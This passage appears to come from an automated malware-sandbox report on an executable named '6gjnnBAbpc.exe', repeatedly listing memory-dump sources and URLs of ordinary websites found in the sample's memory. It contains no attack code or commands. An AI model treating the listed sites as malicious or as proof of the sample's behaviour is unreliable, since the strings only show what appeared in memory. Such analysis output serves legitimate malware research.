00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/logo_01-1.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F&#038;format=xm
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/wp/v2/pages/1009
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.465287459.0000000008D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/d
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307688121.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.306509483.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.305889381.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421450245.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008DEE000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/$
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sbc.si/o-sbc/organizacija
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668175631.0000000008D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spanesi.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajerskagz.si/o-sgz-2/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stnic.co.uk/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tecos.si/index.php/sl/o-podjetju/predstavitev
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D7C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D7D000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wifi4all.nl/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wifi4all.nl/0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.311949440.0000000008D74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.xaicom.es/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.yoruksut.com.tr
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/e1ZfpowjQRo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 